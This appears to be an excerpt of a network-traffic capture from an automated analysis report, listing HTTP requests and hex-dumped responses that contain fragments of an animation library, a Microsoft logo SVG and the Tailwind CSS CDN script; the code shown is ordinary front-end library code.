2024-12-20 12:46:35 UTC	1378	IN	Data Raw: 2f 28 5e 23 5b 30 2d 39 41 2d 46 5d 7b 36 7d 24 29 7c 28 5e 23 5b 30 2d 39 41 2d 46 5d 7b 33 7d 24 29 2f 69 2e 74 65 73 74 28 6e 29 7d 2c 72 67 62 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 2f 5e 72 67 62 2f 2e 74 65 73 74 28 6e 29 7d 2c 68 73 6c 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 2f 5e 68 73 6c 2f 2e 74 65 73 74 28 6e 29 7d 2c 63 6f 6c 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 77 2e 68 65 78 28 6e 29 7c 7c 77 2e 72 67 62 28 6e 29 7c 7c 77 2e 68 73 6c 28 6e 29 7d 2c 6b 65 79 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 21 69 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6e 29 26 26 21 4d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6e 29 26 26 22 74 61 72 67 65 74 73 22 21 3d 3d 6e 26 Data Ascii: /(^#[0-9A-F]{6}$)\|(^#[0-9A-F]{3}$)/i.test(n)},rgb:function(n){return/^rgb/.test(n)},hsl:function(n){return/^hsl/.test(n)},col:function(n){return w.hex(n)\|\|w.rgb(n)\|\|w.hsl(n)},key:function(n){return!i.hasOwnProperty(n)&&!M.hasOwnProperty(n)&&"targets"!==n&
2024-12-20 12:46:35 UTC	1378	IN	Data Raw: 3d 66 29 72 65 74 75 72 6e 20 75 3b 75 2d 3d 28 6b 28 75 2c 69 2c 63 29 2d 6f 29 2f 66 7d 72 65 74 75 72 6e 20 75 7d 69 66 28 30 3d 3d 3d 61 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 6c 2c 64 2c 70 3d 6e 2c 68 3d 65 2c 67 3d 65 2b 2e 31 2c 6d 3d 62 2c 76 3d 4d 2c 79 3d 30 3b 30 3c 28 6c 3d 6b 28 64 3d 68 2b 28 67 2d 68 29 2f 32 2c 6d 2c 76 29 2d 70 29 3f 67 3d 64 3a 68 3d 64 2c 31 65 2d 37 3c 4d 61 74 68 2e 61 62 73 28 6c 29 26 26 2b 2b 79 3c 31 30 3b 29 3b 72 65 74 75 72 6e 20 64 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 6e 2c 65 29 7b 72 65 74 75 72 6e 20 31 2d 33 2a 65 2b 33 2a 6e 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 6e 2c 65 2c 74 29 7b 72 65 74 75 72 6e 28 28 72 28 65 2c 74 29 2a 6e 2b 28 33 2a 74 2d 36 2a 65 29 29 2a 6e 2b 33 2a 65 29 2a Data Ascii: =f)return u;u-=(k(u,i,c)-o)/f}return u}if(0===a)return r;for(var l,d,p=n,h=e,g=e+.1,m=b,v=M,y=0;0<(l=k(d=h+(g-h)/2,m,v)-p)?g=d:h=d,1e-7<Math.abs(l)&&++y<10;);return d}};function r(n,e){return 1-3e+3n}function k(n,e,t){return((r(e,t)n+(3t-6e))n+3e)
2024-12-20 12:46:35 UTC	1378	IN	Data Raw: 20 6e 3c 2e 35 3f 28 31 2d 72 28 65 2c 74 29 28 31 2d 32 2a 6e 29 29 2f 32 3a 28 72 28 65 2c 74 29 28 32 2a 6e 2d 31 29 2b 31 29 2f 32 7d 7d 7d 29 3b 76 61 72 20 65 2c 74 2c 73 3d 65 3b 66 75 6e 63 74 69 6f 6e 20 50 28 6e 2c 65 29 7b 69 66 28 77 2e 66 6e 63 28 6e 29 29 72 65 74 75 72 6e 20 6e 3b 76 61 72 20 74 3d 6e 2e 73 70 6c 69 74 28 22 28 22 29 5b 30 5d 2c 72 3d 73 5b 74 5d 2c 61 3d 64 28 6e 29 3b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 73 70 72 69 6e 67 22 3a 72 65 74 75 72 6e 20 63 28 6e 2c 65 29 3b 63 61 73 65 22 63 75 62 69 63 42 65 7a 69 65 72 22 3a 72 65 74 75 72 6e 20 6f 28 48 2c 61 29 3b 63 61 73 65 22 73 74 65 70 73 22 3a 72 65 74 75 72 6e 20 6f 28 71 2c 61 29 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 6f 28 72 2c 61 29 7d 7d 66 75 Data Ascii: n<.5?(1-r(e,t)(1-2n))/2:(r(e,t)(2n-1)+1)/2}}});var e,t,s=e;function P(n,e){if(w.fnc(n))return n;var t=n.split("(")[0],r=s[t],a=d(n);switch(t){case"spring":return c(n,e);case"cubicBezier":return o(H,a);case"steps":return o(q,a);default:return o(r,a)}}fu
2024-12-20 12:46:35 UTC	1378	IN	Data Raw: 2e 5d 2b 29 25 2c 5c 73 2a 28 5b 5c 64 2e 5d 2b 29 5c 29 2f 67 2e 65 78 65 63 28 74 29 2c 6e 3d 70 61 72 73 65 49 6e 74 28 74 5b 31 5d 2c 31 30 29 2f 33 36 30 2c 75 3d 70 61 72 73 65 49 6e 74 28 74 5b 32 5d 2c 31 30 29 2f 31 30 30 2c 69 3d 70 61 72 73 65 49 6e 74 28 74 5b 33 5d 2c 31 30 29 2f 31 30 30 2c 74 3d 74 5b 34 5d 7c 7c 31 2c 30 3d 3d 75 3f 72 3d 61 3d 6f 3d 69 3a 28 72 3d 63 28 75 3d 32 2a 69 2d 28 69 3d 69 3c 2e 35 3f 69 2a 28 31 2b 75 29 3a 69 2b 75 2d 69 2a 75 29 2c 69 2c 6e 2b 31 2f 33 29 2c 61 3d 63 28 75 2c 69 2c 6e 29 2c 6f 3d 63 28 75 2c 69 2c 6e 2d 31 2f 33 29 29 2c 22 72 67 62 61 28 22 2b 32 35 35 2a 72 2b 22 2c 22 2b 32 35 35 2a 61 2b 22 2c 22 2b 32 35 35 2a 6f 2b 22 2c 22 2b 74 2b 22 29 22 29 3a 76 6f 69 64 20 30 3b 66 75 6e 63 74 69 Data Ascii: .]+)%,\s([\d.]+)\)/g.exec(t),n=parseInt(t[1],10)/360,u=parseInt(t[2],10)/100,i=parseInt(t[3],10)/100,t=t[4]\|\|1,0==u?r=a=o=i:(r=c(u=2i-(i=i<.5?i(1+u):i+u-iu),i,n+1/3),a=c(u,i,n),o=c(u,i,n-1/3)),"rgba("+255r+","+255a+","+255*o+","+t+")"):void 0;functi
2024-12-20 12:46:35 UTC	1378	IN	Data Raw: 3b 65 3d 72 2e 65 78 65 63 28 74 29 3b 29 61 2e 73 65 74 28 65 5b 31 5d 2c 65 5b 32 5d 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 58 28 6e 2c 65 2c 74 2c 72 29 7b 76 61 72 20 61 3d 75 28 65 2c 22 73 63 61 6c 65 22 29 3f 31 3a 30 2b 28 75 28 61 3d 65 2c 22 74 72 61 6e 73 6c 61 74 65 22 29 7c 7c 22 70 65 72 73 70 65 63 74 69 76 65 22 3d 3d 3d 61 3f 22 70 78 22 3a 75 28 61 2c 22 72 6f 74 61 74 65 22 29 7c 7c 75 28 61 2c 22 73 6b 65 77 22 29 3f 22 64 65 67 22 3a 76 6f 69 64 20 30 29 2c 6f 3d 57 28 6e 29 2e 67 65 74 28 65 29 7c 7c 61 3b 72 65 74 75 72 6e 20 74 26 26 28 74 2e 74 72 61 6e 73 66 6f 72 6d 73 2e 6c 69 73 74 2e 73 65 74 28 65 2c 6f 29 2c 74 2e 74 72 61 6e 73 66 6f 72 6d 73 2e 6c 61 73 74 3d 65 29 2c 72 3f 79 28 6e 2c 6f 2c 72 29 Data Ascii: ;e=r.exec(t);)a.set(e[1],e[2]);return a}}function X(n,e,t,r){var a=u(e,"scale")?1:0+(u(a=e,"translate")\|\|"perspective"===a?"px":u(a,"rotate")\|\|u(a,"skew")?"deg":void 0),o=W(n).get(e)\|\|a;return t&&(t.transforms.list.set(e,o),t.transforms.last=e),r?y(n,o,r)
2024-12-20 12:46:35 UTC	1378	IN	Data Raw: 65 6e 74 4e 6f 64 65 29 3b 29 65 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 65 7d 28 6e 29 2c 74 3d 6e 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 2c 72 3d 76 28 6e 2c 22 76 69 65 77 42 6f 78 22 29 2c 61 3d 74 2e 77 69 64 74 68 2c 74 3d 74 2e 68 65 69 67 68 74 2c 65 3d 65 2e 76 69 65 77 42 6f 78 7c 7c 28 72 3f 72 2e 73 70 6c 69 74 28 22 20 22 29 3a 5b 30 2c 30 2c 61 2c 74 5d 29 3b 72 65 74 75 72 6e 7b 65 6c 3a 6e 2c 76 69 65 77 42 6f 78 3a 65 2c 78 3a 2b 65 5b 30 5d 2c 79 3a 2b 65 5b 31 5d 2c 77 3a 61 2c 68 3a 74 2c 76 57 3a 65 5b 32 5d 2c 76 48 3a 65 5b 33 5d 7d 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 6e 2c 65 29 7b 76 61 72 20 74 3d 2f 5b 2b 2d 5d 3f 5c 64 2a 5c 2e 3f 5c 64 2b 28 3f 3a 5c 2e 5c 64 2b 29 3f 28 Data Ascii: entNode);)e=e.parentNode;return e}(n),t=n.getBoundingClientRect(),r=v(n,"viewBox"),a=t.width,t=t.height,e=e.viewBox\|\|(r?r.split(" "):[0,0,a,t]);return{el:n,viewBox:e,x:+e[0],y:+e[1],w:a,h:t,vW:e[2],vH:e[3]}}function z(n,e){var t=/[+-]?\d*\.?\d+(?:\.\d+)?(
2024-12-20 12:46:35 UTC	1378	IN	Data Raw: 67 74 68 2d 31 3f 74 2e 65 6e 64 44 65 6c 61 79 3a 30 29 2c 6e 7d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 44 28 6e 2c 72 29 7d 29 7d 28 65 5b 74 5d 2c 6e 29 7d 29 3b 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 69 2c 63 29 7b 76 61 72 20 73 3b 72 65 74 75 72 6e 20 69 2e 74 77 65 65 6e 73 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 29 7b 76 61 72 20 74 2c 72 3d 7b 7d 3b 66 6f 72 28 74 20 69 6e 20 6e 29 7b 76 61 72 20 61 3d 6d 28 6e 5b 74 5d 2c 65 29 3b 77 2e 61 72 72 28 61 29 26 26 31 3d 3d 3d 28 61 3d 61 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6d 28 6e 2c 65 29 7d 29 29 2e 6c 65 6e 67 74 68 26 26 28 61 3d 61 5b 30 Data Ascii: gth-1?t.endDelay:0),n}).map(function(n){return D(n,r)})}(e[t],n)});return r}function K(i,c){var s;return i.tweens.map(function(n){var n=function(n,e){var t,r={};for(t in n){var a=m(n[t],e);w.arr(a)&&1===(a=a.map(function(n){return m(n,e)})).length&&(a=a[0
2024-12-20 12:46:35 UTC	1378	IN	Data Raw: 74 69 6f 6e 3a 74 2e 65 6e 64 2c 64 65 6c 61 79 3a 65 5b 30 5d 2e 64 65 6c 61 79 2c 65 6e 64 44 65 6c 61 79 3a 74 2e 65 6e 64 44 65 6c 61 79 7d 7d 29 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 21 77 2e 75 6e 64 28 6e 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 74 6e 28 6e 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 74 69 6d 65 6c 69 6e 65 4f 66 66 73 65 74 7c 7c 30 7d 76 61 72 20 72 3d 6e 2e 6c 65 6e 67 74 68 2c 61 3d 7b 7d 3b 72 65 74 75 72 6e 20 61 2e 64 75 72 61 74 69 6f 6e 3d 72 3f 4d 61 74 68 2e 6d 61 78 2e 61 70 70 6c 79 28 4d 61 74 68 2c 6e 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 28 6e 29 2b 6e 2e 64 75 72 61 74 69 6f 6e 7d 29 29 3a 65 2e 64 75 72 61 74 69 6f Data Ascii: tion:t.end,delay:e[0].delay,endDelay:t.endDelay}})})),function(n){return!w.und(n)})}function tn(n,e){function t(n){return n.timelineOffset\|\|0}var r=n.length,a={};return a.duration=r?Math.max.apply(Math,n.map(function(n){return t(n)+n.duration})):e.duratio
2024-12-20 12:46:35 UTC	1378	IN	Data Raw: 6c 22 21 3d 3d 6e 3f 22 6e 6f 72 6d 61 6c 22 3a 22 72 65 76 65 72 73 65 22 29 2c 6b 2e 72 65 76 65 72 73 65 64 3d 21 6b 2e 72 65 76 65 72 73 65 64 2c 63 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 72 65 76 65 72 73 65 64 3d 6b 2e 72 65 76 65 72 73 65 64 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 6e 29 7b 72 65 74 75 72 6e 20 6b 2e 72 65 76 65 72 73 65 64 3f 6b 2e 64 75 72 61 74 69 6f 6e 2d 6e 3a 6e 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 73 3d 30 2c 66 3d 6d 28 6b 2e 63 75 72 72 65 6e 74 54 69 6d 65 29 2a 28 31 2f 4c 2e 73 70 65 65 64 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 6e 2c 65 29 7b 65 26 26 65 2e 73 65 65 6b 28 6e 2d 65 2e 74 69 6d 65 6c 69 6e 65 4f 66 66 73 65 74 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 Data Ascii: l"!==n?"normal":"reverse"),k.reversed=!k.reversed,c.forEach(function(n){return n.reversed=k.reversed})}function m(n){return k.reversed?k.duration-n:n}function o(){s=0,f=m(k.currentTime)*(1/L.speed)}function v(n,e){e&&e.seek(n-e.timelineOffset)}function y(

Timestamp	Bytes transferred	Direction	Data
2024-12-20 12:46:36 UTC	420	OUT	GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1 Host: aadcdn.msftauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-20 12:46:36 UTC	738	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 23439919 Cache-Control: public, max-age=31536000 Content-MD5: nzaLxFgP7ZB3dfMcaybWzw== Content-Type: image/svg+xml Date: Fri, 20 Dec 2024 12:46:36 GMT Etag: 0x8DB5C3F495F4B8C Last-Modified: Wed, 24 May 2023 10:11:48 GMT Server: ECAcc (lhc/7892) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 002cd9d5-201e-00e1-69ad-7d6453000000 x-ms-version: 2009-09-19 Content-Length: 3651 Connection: close
2024-12-20 12:46:36 UTC	3651	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0

Timestamp	Bytes transferred	Direction	Data
2024-12-20 12:46:37 UTC	349	OUT	GET /3.4.16 HTTP/1.1 Host: cdn.tailwindcss.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-20 12:46:38 UTC	424	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 12:46:38 GMT Content-Type: text/javascript Transfer-Encoding: chunked Connection: close Cache-Control: max-age=31536000 strict-transport-security: max-age=63072000 x-vercel-cache: MISS x-vercel-id: cle1::iad1::rv4dn-1733520637303-9c55b126e284 Last-Modified: Fri, 06 Dec 2024 21:30:37 GMT CF-Cache-Status: HIT Age: 128426 Server: cloudflare CF-RAY: 8f4fbc8068e70f87-EWR
2024-12-20 12:46:38 UTC	945	IN	Data Raw: 37 64 66 38 0d 0a 28 28 29 3d 3e 7b 76 61 72 20 71 76 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3b 76 61 72 20 48 69 3d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3b 76 61 72 20 24 76 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 3b 76 61 72 20 4c 76 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 3b 76 61 72 20 4d 76 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2c 4e 76 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 76 61 72 20 64 66 3d 72 3d 3e 48 69 28 72 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 3b 76 61 72 20 68 66 3d 72 3d 3e 7b 69 66 28 74 79 Data Ascii: 7df8(()=>{var qv=Object.create;var Hi=Object.defineProperty;var $v=Object.getOwnPropertyDescriptor;var Lv=Object.getOwnPropertyNames;var Mv=Object.getPrototypeOf,Nv=Object.prototype.hasOwnProperty;var df=r=>Hi(r,"__esModule",{value:!0});var hf=r=>{if(ty
2024-12-20 12:46:38 UTC	1369	IN	Data Raw: 72 65 61 64 46 69 6c 65 53 79 6e 63 3a 72 3d 3e 73 65 6c 66 5b 72 5d 7c 7c 22 22 2c 73 74 61 74 53 79 6e 63 3a 28 29 3d 3e 28 7b 6d 74 69 6d 65 4d 73 3a 46 76 2b 2b 7d 29 2c 70 72 6f 6d 69 73 65 73 3a 7b 72 65 61 64 46 69 6c 65 3a 72 3d 3e 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 65 6c 66 5b 72 5d 7c 7c 22 22 29 7d 7d 7d 29 3b 76 61 72 20 46 73 3d 78 28 28 6f 50 2c 67 66 29 3d 3e 7b 75 28 29 3b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6d 66 3d 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 3d 7b 7d 29 7b 69 66 28 21 28 65 2e 6d 61 78 53 69 7a 65 26 26 65 2e 6d 61 78 53 69 7a 65 3e 30 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 60 6d 61 78 53 69 7a 65 60 20 6d 75 73 74 20 62 65 20 61 20 6e 75 6d 62 65 Data Ascii: readFileSync:r=>self[r]\|\|"",statSync:()=>({mtimeMs:Fv++}),promises:{readFile:r=>Promise.resolve(self[r]\|\|"")}}});var Fs=x((oP,gf)=>{u();"use strict";var mf=class{constructor(e={}){if(!(e.maxSize&&e.maxSize>0))throw new TypeError("`maxSize` must be a numbe
2024-12-20 12:46:38 UTC	1369	IN	Data Raw: 6c 65 74 65 49 66 45 78 70 69 72 65 64 28 74 2c 69 29 3d 3d 3d 21 31 26 26 28 79 69 65 6c 64 20 65 29 7d 7d 67 65 74 28 65 29 7b 69 66 28 74 68 69 73 2e 63 61 63 68 65 2e 68 61 73 28 65 29 29 7b 6c 65 74 20 74 3d 74 68 69 73 2e 63 61 63 68 65 2e 67 65 74 28 65 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 56 61 6c 75 65 28 65 2c 74 29 7d 69 66 28 74 68 69 73 2e 6f 6c 64 43 61 63 68 65 2e 68 61 73 28 65 29 29 7b 6c 65 74 20 74 3d 74 68 69 73 2e 6f 6c 64 43 61 63 68 65 2e 67 65 74 28 65 29 3b 69 66 28 74 68 69 73 2e 5f 64 65 6c 65 74 65 49 66 45 78 70 69 72 65 64 28 65 2c 74 29 3d 3d 3d 21 31 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 6d 6f 76 65 54 6f 52 65 63 65 6e 74 28 65 2c 74 29 2c 74 2e 76 61 6c 75 65 7d 7d 73 65 74 28 65 2c 74 2c Data Ascii: leteIfExpired(t,i)===!1&&(yield e)}}get(e){if(this.cache.has(e)){let t=this.cache.get(e);return this._getItemValue(e,t)}if(this.oldCache.has(e)){let t=this.oldCache.get(e);if(this._deleteIfExpired(e,t)===!1)return this._moveToRecent(e,t),t.value}}set(e,t,
2024-12-20 12:46:38 UTC	1369	IN	Data Raw: 74 68 69 73 2e 63 61 63 68 65 2e 68 61 73 28 74 29 7c 7c 74 68 69 73 2e 5f 64 65 6c 65 74 65 49 66 45 78 70 69 72 65 64 28 74 2c 69 29 3d 3d 3d 21 31 26 26 28 79 69 65 6c 64 5b 74 2c 69 2e 76 61 6c 75 65 5d 29 7d 7d 2a 65 6e 74 72 69 65 73 44 65 73 63 65 6e 64 69 6e 67 28 29 7b 6c 65 74 20 65 3d 5b 2e 2e 2e 74 68 69 73 2e 63 61 63 68 65 5d 3b 66 6f 72 28 6c 65 74 20 74 3d 65 2e 6c 65 6e 67 74 68 2d 31 3b 74 3e 3d 30 3b 2d 2d 74 29 7b 6c 65 74 20 69 3d 65 5b 74 5d 2c 5b 6e 2c 73 5d 3d 69 3b 74 68 69 73 2e 5f 64 65 6c 65 74 65 49 66 45 78 70 69 72 65 64 28 6e 2c 73 29 3d 3d 3d 21 31 26 26 28 79 69 65 6c 64 5b 6e 2c 73 2e 76 61 6c 75 65 5d 29 7d 65 3d 5b 2e 2e 2e 74 68 69 73 2e 6f 6c 64 43 61 63 68 65 5d 3b 66 6f 72 28 6c 65 74 20 74 3d 65 2e 6c 65 6e 67 74 Data Ascii: this.cache.has(t)\|\|this._deleteIfExpired(t,i)===!1&&(yield[t,i.value])}}*entriesDescending(){let e=[...this.cache];for(let t=e.length-1;t>=0;--t){let i=e[t],[n,s]=i;this._deleteIfExpired(n,s)===!1&&(yield[n,s.value])}e=[...this.oldCache];for(let t=e.lengt
2024-12-20 12:46:38 UTC	1369	IN	Data Raw: 78 22 2c 22 66 6c 65 78 53 68 72 69 6e 6b 22 2c 22 66 6c 65 78 47 72 6f 77 22 2c 22 66 6c 65 78 42 61 73 69 73 22 2c 22 74 61 62 6c 65 4c 61 79 6f 75 74 22 2c 22 63 61 70 74 69 6f 6e 53 69 64 65 22 2c 22 62 6f 72 64 65 72 43 6f 6c 6c 61 70 73 65 22 2c 22 62 6f 72 64 65 72 53 70 61 63 69 6e 67 22 2c 22 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 22 2c 22 74 72 61 6e 73 6c 61 74 65 22 2c 22 72 6f 74 61 74 65 22 2c 22 73 6b 65 77 22 2c 22 73 63 61 6c 65 22 2c 22 74 72 61 6e 73 66 6f 72 6d 22 2c 22 61 6e 69 6d 61 74 69 6f 6e 22 2c 22 63 75 72 73 6f 72 22 2c 22 74 6f 75 63 68 41 63 74 69 6f 6e 22 2c 22 75 73 65 72 53 65 6c 65 63 74 22 2c 22 72 65 73 69 7a 65 22 2c 22 73 63 72 6f 6c 6c 53 6e 61 70 54 79 70 65 22 2c 22 73 63 72 6f 6c 6c 53 6e 61 70 41 6c 69 67 Data Ascii: x","flexShrink","flexGrow","flexBasis","tableLayout","captionSide","borderCollapse","borderSpacing","transformOrigin","translate","rotate","skew","scale","transform","animation","cursor","touchAction","userSelect","resize","scrollSnapType","scrollSnapAlig
2024-12-20 12:46:38 UTC	1369	IN	Data Raw: 22 2c 22 74 65 78 74 4f 70 61 63 69 74 79 22 2c 22 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 22 2c 22 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 43 6f 6c 6f 72 22 2c 22 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 53 74 79 6c 65 22 2c 22 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 54 68 69 63 6b 6e 65 73 73 22 2c 22 74 65 78 74 55 6e 64 65 72 6c 69 6e 65 4f 66 66 73 65 74 22 2c 22 66 6f 6e 74 53 6d 6f 6f 74 68 69 6e 67 22 2c 22 70 6c 61 63 65 68 6f 6c 64 65 72 43 6f 6c 6f 72 22 2c 22 70 6c 61 63 65 68 6f 6c 64 65 72 4f 70 61 63 69 74 79 22 2c 22 63 61 72 65 74 43 6f 6c 6f 72 22 2c 22 61 63 63 65 6e 74 43 6f 6c 6f 72 22 2c 22 6f 70 61 63 69 74 79 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 42 6c 65 6e 64 4d 6f 64 65 22 2c 22 6d 69 78 42 6c 65 6e 64 4d 6f 64 65 22 2c Data Ascii: ","textOpacity","textDecoration","textDecorationColor","textDecorationStyle","textDecorationThickness","textUnderlineOffset","fontSmoothing","placeholderColor","placeholderOpacity","caretColor","accentColor","opacity","backgroundBlendMode","mixBlendMode",
2024-12-20 12:46:38 UTC	1369	IN	Data Raw: 61 79 2e 69 73 41 72 72 61 79 28 72 29 3f 5b 72 5d 3a 5b 65 2c 72 5d 29 7d 2c 77 61 72 6e 28 72 2c 65 29 7b 5b 22 63 6f 6e 74 65 6e 74 2d 70 72 6f 62 6c 65 6d 73 22 5d 2e 69 6e 63 6c 75 64 65 73 28 72 29 7c 7c 6a 73 28 51 65 2e 62 6f 6c 64 28 51 65 2e 79 65 6c 6c 6f 77 28 22 77 61 72 6e 22 29 29 2c 2e 2e 2e 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 72 29 3f 5b 72 5d 3a 5b 65 2c 72 5d 29 7d 2c 72 69 73 6b 28 72 2c 65 29 7b 6a 73 28 51 65 2e 62 6f 6c 64 28 51 65 2e 6d 61 67 65 6e 74 61 28 22 72 69 73 6b 22 29 29 2c 2e 2e 2e 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 72 29 3f 5b 72 5d 3a 5b 65 2c 72 5d 29 7d 7d 7d 29 3b 76 61 72 20 5f 66 3d 7b 7d 3b 47 65 28 5f 66 2c 7b 64 65 66 61 75 6c 74 3a 28 29 3d 3e 55 73 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 71 72 28 7b Data Ascii: ay.isArray(r)?[r]:[e,r])},warn(r,e){["content-problems"].includes(r)\|\|js(Qe.bold(Qe.yellow("warn")),...Array.isArray(r)?[r]:[e,r])},risk(r,e){js(Qe.bold(Qe.magenta("risk")),...Array.isArray(r)?[r]:[e,r])}}});var _f={};Ge(_f,{default:()=>Us});function qr({
